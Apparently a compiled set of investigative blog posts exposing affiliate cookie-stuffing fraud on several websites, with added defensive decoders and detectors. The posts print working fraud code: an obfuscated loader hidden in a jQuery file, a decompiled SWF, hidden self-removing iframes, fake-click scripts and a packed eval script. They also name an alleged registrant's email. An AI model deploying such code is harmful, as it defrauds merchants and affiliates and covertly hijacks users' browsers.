Qbnews.cn ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading qbnews.cn results in a request for www.52zhishi.com/v.swf, which is in turn responsible for requesting www.52zhishi.com/v.asp. The ASP file returns a list of URLs (affiliate click links included); the Flash payload in the browser then invisibly requests each of those links, and the cookies set during these lookups are the forced/faked affiliate clicks.

The question now is where the initial request to 52zhishi.com comes from, i.e., what exactly is responsible for it? If you search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you search dynamically (via the DOM) you’re still not going to find it. Babyface is like many of the technical marvels among blackhats in this space: not the brightest bulb on the ever-shrinking Christmas tree specially reserved for them, and so totally predictable.

Take a look at http://www.qbnews.cn/statics/js/jquery.min.js and you’ll find what looks to be a jQuery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires...

In compromising this site, he has hidden his activities in this jQuery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// qbnews.cn loads on a javascript enabled browser
(function()
{
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
  {
    try
    {
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101) 
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals "http://www.52zhishi.com/v.swf"
      var p=String.fromCharCode(
        104,116,116,112,58,47,47,119,119, 
        119,46,53,50,122,104,105,115,104,
        105,46,99,111,109,47,118,46,115,119,102) 
        + "?i=" + (new Date()).valueOf();
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
        (function()
        {
          if(!c.body)
          {
            setTimeout(arguments.callee,1000)
          }
          else
          {
            c.body.insertBefore(s,c.body.lastChild)
          }
        })()
    }
    catch(e)
    {
    }
  }
})();
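The two String.fromCharCode sequences above were decoded by hand. As an added example (not code from the original post), here is a small Node.js script that does the same thing statically for a whole file: it rewrites every String.fromCharCode(...) call into the literal it encodes without evaluating anything, and flags decoded values that look like a remote loader. The SAMPLE input is a condensed copy of the injected snippet; the function names are my own.

```javascript
// Added example (not from the original post): a static triage helper that finds
// every String.fromCharCode(...) call in a script and replaces it with the decoded
// string literal, so a cookie name or payload URL hidden this way reads in clear.
// Nothing is eval'd: the numeric arguments are parsed and decoded directly.

const FROM_CHAR_CODE = /String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/g;

// Decode one argument list such as "98, 97, 98, 121" into the string it encodes.
function decodeCharCodes(argList) {
  const codes = argList
    .split(",")
    .map(s => s.trim())
    .filter(s => s !== "")          // tolerate a trailing comma
    .map(Number);
  return String.fromCharCode(...codes);
}

// Rewrite every fromCharCode call into a plain JS string literal and collect the
// decoded values. Returns { rewritten, strings } in order of appearance.
function revealCharCodes(script) {
  const strings = [];
  const rewritten = script.replace(FROM_CHAR_CODE, (_, args) => {
    const s = decodeCharCodes(args);
    strings.push(s);
    return JSON.stringify(s);
  });
  return { rewritten, strings };
}

// Flag decoded strings that look like a remote loader: a URL, or a .swf reference.
function suspiciousStrings(strings) {
  return strings.filter(s => /^https?:\/\//i.test(s) || /\.swf\b/i.test(s));
}

// Constructed sample: the injected snippet from the post, condensed. The spaces
// and line breaks inside the argument lists are exactly what the regex tolerates.
const SAMPLE = `(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){
var p=String.fromCharCode(104,116,116,112,58,47,47,119,119,
119,46,53,50,122,104,105,115,104,
105,46,99,111,109,47,118,46,115,119,102)+"?i="+(new Date()).valueOf();}})();`;

const RESULT = revealCharCodes(SAMPLE);
console.log("decoded strings:", RESULT.strings);
console.log("suspicious:", suspiciousStrings(RESULT.strings));
console.log(RESULT.rewritten);
```

Run it over a copy of the suspect jquery.min.js and diff the rewritten file against a pristine jQuery release of the same version; the injected block is the only region that changes.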

So the JavaScript above answers our earlier question of what is responsible for the request to 52zhishi.com. The SWF that is loaded as a result of this JavaScript then calls an ASP file which returns all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.events.*;
    import flash.display.*;
    import flash.net.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends MovieClip {
 
        public var loader:URLLoader;
        public var url:String;
        public var reqURL:URLRequest;
 
        public function MainTimeline(){
            addFrameScript(0, frame1);
        }
        function frame1(){
            Security.allowDomain("*");
            url = "http://www.52zhishi.com/v.asp";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = NaN;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(event.target);
            safe = new Number(loader.data["safe"]);
            url1 = new String(loader.data["url1"]);
            url2 = new String(loader.data["url2"]);
            url3 = new String(loader.data["url3"]);
            url4 = new String(loader.data["url4"]);
            url5 = new String(loader.data["url5"]);
            url6 = new String(loader.data["url6"]);
            url7 = new String(loader.data["url7"]);
            url8 = new String(loader.data["url8"]);
            url9 = new String(loader.data["url9"]);
            url10 = new String(loader.data["url10"]);
            url11 = new String(loader.data["url11"]);
            url12 = new String(loader.data["url12"]);
            url13 = new String(loader.data["url13"]);
            url14 = new String(loader.data["url14"]);
            url15 = new String(loader.data["url15"]);
            url16 = new String(loader.data["url16"]);
            url17 = new String(loader.data["url17"]);
            url18 = new String(loader.data["url18"]);
            url19 = new String(loader.data["url19"]);
            url20 = new String(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                    sendToURL(request1);
                    sendToURL(request2);
                    sendToURL(request3);
                    sendToURL(request4);
                    sendToURL(request5);
                    sendToURL(request6);
                    sendToURL(request7);
                    sendToURL(request8);
                    sendToURL(request9);
                    sendToURL(request10);
                    sendToURL(request11);
                    sendToURL(request12);
                    sendToURL(request13);
                    sendToURL(request14);
                    sendToURL(request15);
                    sendToURL(request16);
                    sendToURL(request17);
                    sendToURL(request18);
                    sendToURL(request19);
                    sendToURL(request20);
                } catch(e:Error) {
                };
            };
        }
    }

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

We’ve recently been watching an Amazon Associates fraudster taking remarkable efforts to cover his tracks.  Like many rogue Associates we’ve looked at, he’s stuffing cookies invisibly.  He’s using Flash-based stuffing, a technique first written up last year.  But he’s several notches more sophisticated than most:

The fraudster begins by buying a 125×125 IFRAME in the targeted site, here phonearena.com (much like the fraudster who targeted Venturebeat).


But his Flash creates a doubly-invisible IFRAME — setting CSS visibility to “hidden” and also setting width and height to just 1 pixel each:

ExternalInterface.call("function(fffff) 
{ 
  var xxxxx = document.createElement (\'iframe\'); 
  xxxxx.id = \'xxxxx\'; 
  xxxxx.name = \'xxxxx\'; 
  xxxxx.style.visibility = \'hidden\'; 
  xxxxx.style.width = \'1px\';  
  xxxxx.style.height = \'1px\'; 
  var yyyyy = document.body; 
  yyyyy.appendChild (xxxxx); ...

If you’re hoping to see the fraudster’s IFRAME with ordinary visual inspection, you’ll be disappointed: it’s doubly-invisible, as instructed by the preceding code.

Second, the fraudster uses JavaScript to remove the IFRAME that stuffs Amazon cookies, just ten seconds after the IFRAME loads:

xxxxx.onload = function() 
{ 
  setTimeout (function() 
   {yyyyy.removeChild (xxxxx);}, 10000); 
 }; 
 xxxxx.src = fffff; }", arg1);

Any investigator wanting to find the fraudster’s IFRAME by inspecting the page DOM would have just ten seconds to do so — usually not enough.
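As an added example, not part of the original write-up, the following browser-side watcher addresses both tricks: it logs every iframe, img, object or embed the moment it is inserted, records why it counts as invisible (display:none, visibility:hidden, or a 1×1 box), and keeps the record after the node is removed, so the ten-second window no longer matters. Function names and the constructed test doubles are my own; in a browser it needs to be installed before the ad's Flash runs, for instance from a user script or a DevTools snippet, because a MutationObserver does not see changes that happened before it was attached.

```javascript
// Added example, not from the original write-up: a DOM watcher that records hidden
// loader elements as they are inserted and keeps the record after they are removed.
// The hidden-ness heuristic covers the visibility:hidden 1px iframe described above
// as well as the display:none 1x1 iframe and the 1x1 IMG seen on other sites.

const WATCHED_TAGS = new Set(["IFRAME", "IMG", "OBJECT", "EMBED"]);

// Pull a pixel size out of "1px", "1" or a numeric attribute; null if unknown.
function toPixels(value) {
  if (value === undefined || value === null || value === "") return null;
  const n = parseFloat(String(value));
  return Number.isNaN(n) ? null : n;
}

// Return the reasons an element counts as hidden; an empty list means visible.
// `el` only needs tagName, style and getAttribute, so plain objects work in tests.
function hiddenReasons(el) {
  const reasons = [];
  const style = el.style || {};
  if (style.display === "none") reasons.push("display:none");
  if (style.visibility === "hidden") reasons.push("visibility:hidden");
  const w = toPixels(style.width) ?? toPixels(el.getAttribute("width"));
  const h = toPixels(style.height) ?? toPixels(el.getAttribute("height"));
  if (w !== null && h !== null && w <= 1 && h <= 1) reasons.push(`${w}x${h} box`);
  return reasons;
}

// Describe one node for the log; returns null for nodes we do not care about.
function describeNode(el) {
  if (!el || !WATCHED_TAGS.has(String(el.tagName).toUpperCase())) return null;
  const reasons = hiddenReasons(el);
  return {
    tag: el.tagName.toUpperCase(),
    src: el.getAttribute("src") || el.getAttribute("data") || "",
    hidden: reasons.length > 0,
    reasons,
  };
}

// Install a MutationObserver that logs additions and removals of watched nodes.
// Returns the log array so it can be inspected after the page has settled.
function watchHiddenLoaders(doc, report = console.log) {
  const log = [];
  const note = (kind, node) => {
    const d = describeNode(node);
    if (d) { log.push({ kind, at: Date.now(), ...d }); report(kind, d); }
  };
  const observer = new MutationObserver(mutations => {
    for (const m of mutations) {
      m.addedNodes.forEach(n => note("added", n));
      m.removedNodes.forEach(n => note("removed", n));
    }
  });
  observer.observe(doc.documentElement, { childList: true, subtree: true });
  return log;
}

// Constructed test doubles shaped like the elements the write-ups describe.
function fakeElement(tagName, attrs = {}, style = {}) {
  return { tagName, style, getAttribute: name => (name in attrs ? attrs[name] : null) };
}
const doublyInvisibleFrame = fakeElement("iframe", { src: "http://example.invalid/ads/x.php" },
  { visibility: "hidden", width: "1px", height: "1px" });
const displayNoneFrame = fakeElement("iframe",
  { src: "http://example.invalid/click", width: "1", height: "1" }, { display: "none" });
const normalFrame = fakeElement("iframe",
  { src: "http://example.invalid/widget", width: "300", height: "250" });

if (typeof document !== "undefined" && typeof MutationObserver !== "undefined") {
  watchHiddenLoaders(document);      // browser: attach, then let the page run
} else {
  for (const el of [doublyInvisibleFrame, displayNoneFrame, normalFrame]) {
    console.log(describeNode(el));    // Node.js: exercise the heuristic only
  }
}
```

The log entries carry a timestamp, so an "added" followed by a "removed" of the same src roughly ten seconds apart is itself a signal worth alerting on, independent of the element's size.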

Third, this fraudster is rotating among many Amazon Associates IDs.  We found one several months ago, then thirteen more this month.  By using multiple accounts, the fraudster spreads his earnings, and no single account stands out as unreasonably large.  Using many company names is relatively standard among folks with something to hide; recall Direct Revenue’s dozens of company names.  (By using multiple names, companies seek to avoid the notoriety and additional scrutiny that could result from a single large identity.)  In contrast, any legitimate affiliate would want credit, recognition, and extra payment for its high traffic volume.  So spreading traffic across multiple IDs confirms that this fraudster knows he is breaking Amazon’s rules.

Relatedly, this fraudster carefully uses JavaScript to fake clicks such that HTTP Referers and other characteristics look legitimate when traffic reaches Amazon.  This method automatically causes HTTP Referer fields to take values consistent with the Associate IDs described above.  Here’s a sample of the code that fakes a click and causes HTTP Referers to flow accordingly:

var url="http://www.cellphonetech.net/ads/files/xx.php?dtecebenelcedteuea...";
var xxx = document.createElement ("a");
if (typeof(xxx.click) == 'undefined')
{ location.href = url;  }
else
{ xxx.href = url; document.body.appendChild(xxx); xxx.click(); }

Fourth, this fraudster is unusually cautious in how many users he stuffs.  In our testing, his ad stuffs only about one third of users.  Furthermore, he stuffs only on the first visit.  If your IP is not selected on the first visit, you will never be stuffed on any subsequent visit, no matter how many times you revisit.  He also limits his stuffing to certain geographies and with other restrictions we’ll save for another write-up.  Of course this caution comes at a cost — less stuffing relative to his media-buying costs — but the fraudster seems to find this profitable.  Specifically, this reduces his likelihood of detection — letting him continue at greater length.  Combining this caution with the fraudster’s use of Flash, double invisibility, and ten-second automatic removal from the DOM — and he’s unusually hard to catch.

How much money is this fraudster making?  We don’t know for sure, and Amazon has no reason to say.  But the fraudster is buying display ad space on a popular site (Alexa ranking <1500).  That can’t be cheap, and he must anticipate earning money more than enough to cover his costs.  As best we can tell, Amazon Associates is this fraudster’s entire business model, with no other networks being targeted — meaning that Amazon is paying the entire cost of this fraudster’s scheme.

Of course users see nothing — not even an extra popup or popunder.  Users do get a bit of bandwidth wasted by the extra page-load, but even folks on a mobile data plan probably wouldn’t notice.  The big loser is Amazon — paying affiliate fees, as much as 8%, to get traffic it otherwise would have received completely free.  We’re also struck by the losses to other affiliates: If another affiliate truly referred the user to Amazon, but this fraudster interceded to stuff its cookie, then the honest affiliate’s commission is stolen by this fraudster.

Here’s a sampling of the Amazon Associates IDs we’ve seen this fraudster using:

berryreview-20
fashionfunda-20
horrnigh-20
insidepulse0b-20
onlinecamer0a-20
rivcitspo-20
stratagonline-20
tecbitbytnib-20
tenetu-20
thechicfash04-20
zenilshroff-20

Full packet log of our first observation of this fraudster’s activities available here.

We call this fraudster Cellphonetech because his controlling server is cellphonetech dot net.  WHOIS indicates that the registrant is Lin Yong of Fujian China, email address joannatse01@gmail.com.

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason for this is because Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on wirelesscouponcode.com, casual inspection yields nothing out of the ordinary.


Open up the HTML source behind this page and scroll to line 279, note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

<iframe 
 src="http://click.linksynergy.com/fs-bin/click?id=smaqEgQUEvQ&offerid=222015.10000603&subid=0&type=4" 
 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">
</iframe>

This HTML invisibly loads the affiliate click link and, in turn, the merchant it routes through to (pushing the applicable cookies onto the user’s machine), in this case att.com. I dynamically modified the page to show the att.com page that was hidden; follow the red arrow below.


As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing

Upon casual inspection, bestpcantivirus.com reviews antivirus solutions for your PC. In their own words:

We recommend you the best antivirus software for your PC. Our reviews and recommendations are balanced from the performance, budget and easy to use. Below are the Top 3 Antivirus programs that will give you the best performance and are Worth The Value You Pay For!


There’s a little more to this site than meets the eye. When you visit each of the pages for the products reviewed, bestpcantivirus.com is invisibly forcing affiliate cookies associated with the product in question onto your machine. The idea is that if you end up buying one of these products further down the road, then Bestpcantivirus will be paid a commission for they claim themselves as the entity responsible for the purchase. This is fine if you clicked through on the appropriate affiliate click links, but that’s not what happens here, i.e., Bestpcantivirus is playing the game unfairly. If you are an affiliate competing for the same traffic then you are going to lose.

Line 43 in the HTML source of this bestpcantivirus page has an IMG tag with a src attribute set to a link which will redirect through to an affiliate click link (CJ affiliate id 5727502) and then onto Norton.


Bestpcantivirus knows what they are doing is wrong, so they set the width and height attributes of this malformed image to 1×1; this way you won’t see it if you are just browsing casually. I dynamically modified the DOM to alter the dimensions of this image to 50×50; the red arrow highlights what is really going on:


As always, if you can’t reproduce this for yourself, this packet trace confirms the activity.

I give this scammer a 2/10:

  • 1 point for the most basic form of Cookie-Stuffing
  • 1 point for Cookie-Stuffing multiple merchants:

    Merchant        CJ Affiliate Id
    AVG             5727502
    Eset            3840211
    F-Secure        3840211
    Kaspersky       5727502
    Pandasecurity   5727502
    Zonealarm       3840211

Venturebeat.com (Alexa Rank #2,957) has a number of options available to advertisers. They range from an $11 300×250 CPM model (that’s per thousand impressions on their site) all the way through to $1,500 per week for a 125×125 button:


The weekly button is what is of interest to us today, for one of these advertisers is using Venturebeat to Cookie-Stuff their visitors and steal potential affiliate revenue from honest Amazon affiliates.

Here’s how the scam works:

  1. Advertiser buys advertising space from Venturebeat
  2. Venturebeat may do some quality control to make sure that the ad is a-okay. That check passes, because if you load this particular scammer’s ad verbatim it will not exhibit the Cookie-Stuffing behavior
  3. Venturebeat starts running the ad
  4. Once  the ad is running the advertiser flips a switch on the backend to start the Cookie-Stuffing

Short and sweet. The red arrows highlight the ad:


For the technically inclined, this packet trace steps you through the entire page load and onto the Cookie-Stuffing behavior (the Amazon affiliate id being used in this scam is ‘kitchebelle02-20‘). Worthy of mention:

  • I’ve not attached the Flash in this packet trace, don’t hesitate to contact me if you want it
  • Until Venturebeat takes down this ad, you can reproduce this for yourself by repeatedly loading Venturebeat.com; keep watching your Web debugger until you see the Amazon affiliate URLs being loaded.
  • The scammer uses dreammediasite.com as a demilitarized zone to redirect through http://www.onlinespy.net/awesome-high-tech-kitchen-gadgets/, which then acts as the referrer to Amazon. That’s no blank referrer, and if you load onlinespy.net without the demilitarized zone as the referrer then you simply get a WordPress site. Nice!

I give this scammer a 5/10

  • 1 point for basic Cookie-Stuffing
  • 1 point for using the Flash Bandit (that’s how he displays the ad AND does Cookie-Stuffing)
  • 1 point for the demilitarized zone
  • 1 point for cycling through multiple Amazon affiliate id’s
  • 1 point for investing a fair penny into his scam

Recall from above that it takes $1,500 a week to run this ad. Assuming the scammer took the cheaper monthly option, that means it’s costing him at least $4,500 a month. If the scammer runs at a profit (why else would he be doing this?) then it’s safe for us to assume that Amazon itself is losing at least $4,500 a month to this guy (they are paying a commission when none is owed) and honest Amazon affiliates are losing as well (remember that the nature of Cookie-Stuffing is such that the scammer may be overwriting the cookies of Amazon affiliates that compete for the same traffic).

Travelpixel.com is ranked in the top 100,000 sites in the UK. From their About Us page:

At TravelPixel we hand pick our deals by analysing individual sites one by one. The deals we select then go through our moderation checks to ensure they are valid, offer great value and are clearly displayed.

So they hand pick their deals by analyzing sites one at a time, super, but they hand pick their targets for affiliate fraud one at a time as well, i.e., travelpixel.com is Cookie-Stuffing.

Said the Affiliate: “no, no, it’s all a big mistake!”

It’s easy to say this is all a big mistake and it won’t happen again. Rogue affiliates try to sell this nonsense all of the time. Unfortunately for Travelpixel, the scheme they have concocted here makes it difficult to sell as a mistake.

Said the reader: “alright then, how do they do it?”

If you’re a savvy fraud investigator and have a few moments for a little challenge, then visit this Travelpixel page and try to get to the bottom of what’s going on before reading any further. Remember, finding a Cookie-Stuffer is easy, but telling the story of what’s going on and how it’s happening is the challenge.

For those that don’t have a debug environment (or the patience) at the ready, take a look at this packet trace. In a nutshell:

  • The merchant targeted is holidayextras.co.uk
  • Affiliate Window is the affiliate network used (affiliate id 69714)
  • The false click (awclick.php) was triggered as a result of a 302 redirect from travelpixel.com/galaxy.php
  • travelpixel.com/galaxy.php was triggered as a result of a 302 redirect from travelpixel.com/v4_images/…_travelpixelcom.jpg
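The chain in those bullets was read out of a packet trace by hand. As an added example, not code from the original post, the Node.js script below rebuilds such chains from a request log: each record is a URL with its status and Location header, chains are followed through 3xx responses, and any chain that passes through an affiliate click endpoint is reported together with where it started. The log is constructed: the affiliate-network host, the merchant id, the galaxy.php query and the merchantid/date values in the image name are placeholders; only the paths and the affiliate id 69714 come from the write-up, and the awclick.php "id" parameter name is an assumption.

```javascript
// Added example, not from the original post: rebuild redirect chains from an HTTP
// request log so that an image -> galaxy.php -> awclick.php -> merchant sequence is
// reported automatically rather than found by scrolling through a packet trace.

// Affiliate click endpoints and the query parameter carrying the affiliate id.
// The awclick.php parameter name "id" is an assumption for this example; the
// linksynergy "id" and Amazon "tag" parameters are the ones seen in the write-ups.
const AFFILIATE_ENDPOINTS = [
  { network: "Affiliate Window", test: /\/awclick\.php(\?|$)/i, idParam: "id" },
  { network: "Linkshare", test: /^https?:\/\/click\.linksynergy\.com\/fs-bin\/click/i, idParam: "id" },
  { network: "Amazon Associates", test: /^https?:\/\/(www\.)?amazon\.[a-z.]+\//i, idParam: "tag" },
];

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return ""; }
}

// Return { network, affiliateId } if the URL is an affiliate click link, else null.
function matchAffiliate(url) {
  for (const ep of AFFILIATE_ENDPOINTS) {
    if (!ep.test.test(url)) continue;
    let affiliateId = null;
    try { affiliateId = new URL(url).searchParams.get(ep.idParam); } catch { /* keep null */ }
    return { network: ep.network, affiliateId };
  }
  return null;
}

// Group records into chains: a chain starts at any request that no other record
// redirected to, and follows Location headers while the status is 3xx.
function buildChains(log) {
  const byUrl = new Map(log.map(r => [r.url, r]));
  const redirectTargets = new Set(log.filter(r => r.location).map(r => r.location));
  const chains = [];
  for (const start of log) {
    if (redirectTargets.has(start.url)) continue;
    const chain = [start];
    const seen = new Set([start.url]);      // guards against redirect loops
    let cur = start;
    while (cur.status >= 300 && cur.status < 400 && cur.location &&
           byUrl.has(cur.location) && !seen.has(cur.location)) {
      cur = byUrl.get(cur.location);
      seen.add(cur.url);
      chain.push(cur);
    }
    chains.push(chain);
  }
  return chains;
}

// Report every chain that passes through an affiliate click link. A chain that
// begins as a first-party .jpg and ends on a merchant is the cookie-stuffing tell.
function flagAffiliateChains(chains, publisherHost) {
  const findings = [];
  for (const chain of chains) {
    const hit = chain.map(r => matchAffiliate(r.url)).find(Boolean);
    if (!hit) continue;
    const first = chain[0], last = chain[chain.length - 1];
    findings.push({
      network: hit.network,
      affiliateId: hit.affiliateId,
      hops: chain.map(r => r.url),
      firstPartyStart: hostOf(first.url) === publisherHost,
      imageStart: /\.(jpe?g|png|gif)(\?|$)/i.test(first.url),
      landsOn: hostOf(last.url),
    });
  }
  return findings;
}

// Constructed log in the shape a Web debugger export might take (placeholders marked).
const LOG = [
  { url: "http://www.travelpixel.com/deals/example-deal.html", status: 200, location: null },
  { url: "http://www.travelpixel.com/ajaxify/deal.js", status: 200, location: null },
  { url: "http://www.travelpixel.com/v4_images/1111_20130301_travelpixelcom.jpg", status: 302,
    location: "http://www.travelpixel.com/galaxy.php?m=1111" },
  { url: "http://www.travelpixel.com/galaxy.php?m=1111", status: 302,
    location: "http://affiliate-network.example/awclick.php?mid=MERCHANT_PLACEHOLDER&id=69714" },
  { url: "http://affiliate-network.example/awclick.php?mid=MERCHANT_PLACEHOLDER&id=69714", status: 302,
    location: "http://www.holidayextras.co.uk/?ref=PLACEHOLDER" },
  { url: "http://www.holidayextras.co.uk/?ref=PLACEHOLDER", status: 200, location: null },
];

const FINDINGS = flagAffiliateChains(buildChains(LOG), "www.travelpixel.com");
console.log(JSON.stringify(FINDINGS, null, 2));
```

Exporting a real session from the debugger as URL/status/Location triples is enough to feed this; the two booleans in each finding are what separate a user-initiated affiliate click from a resource the page fetched on its own.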

The question now is what triggered the lookup of travelpixel.com/v4_images/…_travelpixelcom.jpg? If you browse the HTML of this site (static inspection) you will find no reference to this image. If you fire up a debug environment and browse the DOM of this site (dynamic inspection) you will still find no reference to this image.

So what’s going on?

They know what they are doing is wrong and that investigators will eventually come-a-knocking, so they introduce two obstacles:

  • First, they thwart a static investigation by obfuscating their activity in JavaScript
  • Second, they hinder dynamic investigation by removing evidence of their wrong doing from the DOM

The sneaky JavaScript is introduced with a call to travelpixel.com/ajaxify/deal.js:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('$(c).d(4(){2 3=$(\'#0\').1("e");b(3==\'f\'){8()}4 8(){2 6=$(\'#0\').1("a");2 7=$(\'#0\').1("9");$(\'#0\').s(\'<g p="5" q="r://n.m.i/h/\'+6+\'j\'+7+\'k.l"/>\');$(\'#5\').o()}});',
29,29,
'offer_box|attr|var|timer|function|description_test|merchantid|rander|testLink|date|ident|if|document|ready|deal|on|img|v4_images|com|_|_travelpixelcom|jpg|travelpixel|www|remove|id|src|http|append'.split('|'),
0,{}))
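The safe way to read this is not to paste it into a console: the outer eval() runs whatever the decoder returns. As an added example, not code from the original post, the decoder's own algorithm (a word-boundary substitution from a base-a token dictionary) is re-implemented as a plain function that returns the source as a string and executes nothing, applied to the p, a, c and k arguments copied from the blob above. looksPacked is a small detector for the packer's signature; both function names are my own.

```javascript
// Added example, not from the original post: decode a p,a,c,k,e,d packed blob
// without eval(). The packer replaces each word of the source with a base-`a`
// token and ships the dictionary `k`; decoding is a word-by-word substitution,
// which is all the original decoder does before eval() executes the result.

// Return the decoded source as a string. p: packed source, a: token radix,
// c: dictionary size, k: dictionary array (index -> original word).
function unpack(p, a, c, k) {
  const dict = Object.create(null);          // no prototype keys to collide with
  while (c--) dict[c.toString(a)] = k[c] || c.toString(a);
  return p.replace(/\b\w+\b/g, word => (word in dict ? dict[word] : word));
}

// The packer's call signature is a cheap static signature for triage.
function looksPacked(source) {
  return /eval\(function\(p,a,c,k,e,d\)/.test(source);
}

// The four arguments from the blob served as travelpixel.com/ajaxify/deal.js,
// copied as-is (the \' escapes are part of the original string literal).
const PACKED_P = '$(c).d(4(){2 3=$(\'#0\').1("e");b(3==\'f\'){8()}4 8(){2 6=$(\'#0\').1("a");2 7=$(\'#0\').1("9");$(\'#0\').s(\'<g p="5" q="r://n.m.i/h/\'+6+\'j\'+7+\'k.l"/>\');$(\'#5\').o()}});';
const PACKED_A = 29;
const PACKED_C = 29;
const PACKED_K = 'offer_box|attr|var|timer|function|description_test|merchantid|rander|testLink|date|ident|if|document|ready|deal|on|img|v4_images|com|_|_travelpixelcom|jpg|travelpixel|www|remove|id|src|http|append'.split('|');

const DECODED = unpack(PACKED_P, PACKED_A, PACKED_C, PACKED_K);
console.log(DECODED);
```

For any other blob of this family, copy the same four positional arguments out of the trailing `}('…', a, c, '…'.split('|'), 0, {}))` call; the dictionary is always the `|`-separated string and the radix is the first number.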

If you deobfuscate this JavaScript, it boils down to:

$(document).ready(function()
{
  var timer=$('#offer_box').attr("deal");
  if(timer=='on')
  {
    testLink()
  }

  function testLink()
  {
    var merchantid = $('#offer_box').attr("ident");
    var rander=$('#offer_box').attr("date");
    $('#offer_box').append(
      '<img id="description_test" src="http://www.travelpixel.com/v4_images/'
      + merchantid 
      + '_'
      + rander
      + '_travelpixelcom.jpg"/>');
    $('#description_test').remove()
  }
});

This is jQuery that adds an image to the page (using the _travelpixelcom.jpg link we were looking for earlier) and then removes that image from the page immediately thereafter.

